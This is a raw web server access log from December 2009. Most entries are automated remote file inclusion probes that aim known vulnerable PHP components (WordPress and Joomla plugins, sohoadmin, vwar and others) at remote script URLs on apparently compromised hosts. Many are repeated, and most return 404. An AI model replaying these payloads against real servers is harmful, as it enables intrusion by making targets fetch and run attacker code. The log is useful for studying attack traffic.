80.246.53.15 - - [16/Dec/2009:08:29:59 -0600] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:08:29:59 -0600] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:08:30:03 -0600] "GET /logs/access_log.1252022400//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:29 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:29 -0600] "GET /logs/access_log.1248739200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:29 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:29 -0600] "GET /logs/access_log.1243209600/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:08:30:38 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:08:30:39 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
121.101.214.54 - - [16/Dec/2009:08:30:43 -0600] "GET /logs/access_log.1248739200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:43 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:43 -0600] "GET /logs/access_log.1243209600/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:30:43 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:31:27 -0600] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:31:27 -0600] "GET /logs/access_log.1240012800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:31:27 -0600] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:32:32 -0600] "GET /logs/access_log.1244332800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:08:33:20 -0600] "GET /logs/access_log.1233705600//home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:08:33:20 -0600] "GET /logs//home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:08:33:20 -0600] "GET //home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:08:33:39 -0600] "GET /logs/access_log.1233878400//home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:34:37 -0600] "GET /contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:34:37 -0600] "GET /logs/contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:34:37 -0600] "GET /logs/access_log.1255737600/contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:34:51 -0600] "GET /logs/access_log.1255996800/contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:35:55 -0600] "GET /logs/access_log.1243209600/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:35:56 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:35:56 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:08:35:56 -0600] "GET /logs/access_log.1248739200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:36:06 -0600] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:36:06 -0600] "GET /logs/access_log.1240012800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:36:06 -0600] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:37:29 -0600] "GET /logs/access_log.1228867200//include/admin.lib.inc.php?site_path=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:37:29 -0600] "GET //include/admin.lib.inc.php?site_path=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:37:29 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:31 -0600] "GET /logs/access_log.1255824000//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:31 -0600] "GET //saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:31 -0600] "GET /logs//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:32 -0600] "GET //saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:32 -0600] "GET /logs/access_log.1255824000//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:32 -0600] "GET /logs//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:37 -0600] "GET /logs/access_log.1252540800//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:37:38 -0600] "GET /logs/access_log.1252540800//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:08:37:50 -0600] "GET /logs/access_log.1244332800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:38:13 -0600] "GET //saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:38:13 -0600] "GET /logs/access_log.1255824000//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:38:13 -0600] "GET /logs//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:38:13 -0600] "GET /logs/access_log.1252540800//saveserver.php?thisdir=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:39:15 -0600] "GET /contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:39:15 -0600] "GET /logs/contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:39:15 -0600] "GET /logs/access_log.1255996800/contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.50.134.6 - - [16/Dec/2009:08:39:20 -0600] "GET /logs/access_log.1255737600/contenido.php?sec=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.151.70.1 - - [16/Dec/2009:08:39:40 -0600] "GET /logs/board//include/footer.php?_path[counter]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:08:39:40 -0600] "GET /board//include/footer.php?_path[counter]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.833"
201.22.7.240 - - [16/Dec/2009:08:41:07 -0600] "GET /logs//home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:08:41:07 -0600] "GET /logs/access_log.1240272000//home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:08:41:07 -0600] "GET //home.php?content=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
203.233.78.72 - - [16/Dec/2009:08:42:55 -0600] "GET //skin/buzzard_espoon/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 301 "-""Mozilla/5.0"
203.233.78.72 - - [16/Dec/2009:08:42:55 -0600] "GET /logs/access_log.1254441600//skin/buzzard_espoon/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 328 "-""Mozilla/5.0"
203.233.78.72 - - [16/Dec/2009:08:42:55 -0600] "GET /logs//skin/buzzard_espoon/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 306 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:44:06 -0600] "GET /logs//paginedinamiche/main.php?pagina=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:44:06 -0600] "GET //paginedinamiche/main.php?pagina=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:44:06 -0600] "GET /logs/access_log.1244592000//paginedinamiche/main.php?pagina=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:44:08 -0600] "GET //paginedinamiche/main.php?pagina=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:44:08 -0600] "GET /logs//paginedinamiche/main.php?pagina=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:44:08 -0600] "GET /logs/access_log.1244592000//paginedinamiche/main.php?pagina=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.233.78.72 - - [16/Dec/2009:08:44:14 -0600] "GET /logs/access_log.1257465600//skin/buzzard_espoon/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 328 "-""Mozilla/5.0"
203.233.78.72 - - [16/Dec/2009:08:44:23 -0600] "GET /logs/access_log.1256428800//skin/buzzard_espoon/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 328 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:44:50 -0600] "GET //?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:44:50 -0600] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:44:50 -0600] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:44:55 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:08:45:21 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:08:45:21 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
65.55.106.228 - - [16/Dec/2009:08:47:08 -0600] "GET /logs/access_log.1124582400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.47.61.97 - - [16/Dec/2009:08:47:30 -0600] "GET /logs/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 313 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.47.61.97 - - [16/Dec/2009:08:47:30 -0600] "GET /board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 308 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.47.61.97 - - [16/Dec/2009:08:47:30 -0600] "GET /logs/access_log.1233705600/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.47.61.97 - - [16/Dec/2009:08:47:30 -0600] "GET /logs/access_log.1245024000/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.47.61.97 - - [16/Dec/2009:08:47:33 -0600] "GET /logs/access_log.1233705600/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:08:47:33 -0600] "GET /board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:08:47:33 -0600] "GET /logs/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:08:47:33 -0600] "GET /logs/access_log.1245024000/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.116.0.130 - - [16/Dec/2009:08:47:35 -0600] "GET /logs/access_log.1235433600//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:08:47:35 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:08:47:35 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /logs/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /logs/access_log.1254700800/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /logs/access_log.1252627200/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /logs/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /logs/access_log.1254700800/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:08:47:55 -0600] "GET /logs/access_log.1252627200/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:47:56 -0600] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:47:56 -0600] "GET //?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
189.30.242.61 - - [16/Dec/2009:08:48:05 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
65.55.207.48 - - [16/Dec/2009:08:48:38 -0600] "GET /logs/access_log.1242345600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.47.61.97 - - [16/Dec/2009:08:48:44 -0600] "GET /logs/access_log.1233705600/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:08:48:47 -0600] "GET /board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:08:48:47 -0600] "GET /logs/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.47.61.97 - - [16/Dec/2009:08:48:47 -0600] "GET /logs/access_log.1245024000/board//include/footer.php?_path[counter]=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
65.55.106.112 - - [16/Dec/2009:08:49:13 -0600] "GET /logs/access_log.1168214400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.30.242.61 - - [16/Dec/2009:08:49:16 -0600] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.106.110 - - [16/Dec/2009:08:51:38 -0600] "GET /logs/access_log.1165363200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.17.220.190 - - [16/Dec/2009:08:52:30 -0600] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:30 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:30 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:57 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:57 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:57 -0600] "GET /logs/access_log.1230076800//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:59 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:59 -0600] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:52:59 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:53:02 -0600] "GET /logs/access_log.1229385600//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:53:25 -0600] "GET /logs/access_log.1229385600//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.17.220.190 - - [16/Dec/2009:08:53:35 -0600] "GET /logs/access_log.1229385600//modules/vwar/admin/admin.php?vwar_root=http://www.qatarsteel.net/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:08:54:09 -0600] "GET //include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:08:54:09 -0600] "GET /logs//include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:08:54:09 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:08:54:14 -0600] "GET //include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:08:54:14 -0600] "GET /logs//include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:08:54:14 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.131 - - [16/Dec/2009:08:54:38 -0600] "GET /logs/access_log.1123545600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.110.198.81 - - [16/Dec/2009:08:55:11 -0600] "GET /logs/access_log.1248912000///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:55:11 -0600] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:55:11 -0600] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:55:30 -0600] "GET /logs/access_log.1246492800///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:55:44 -0600] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
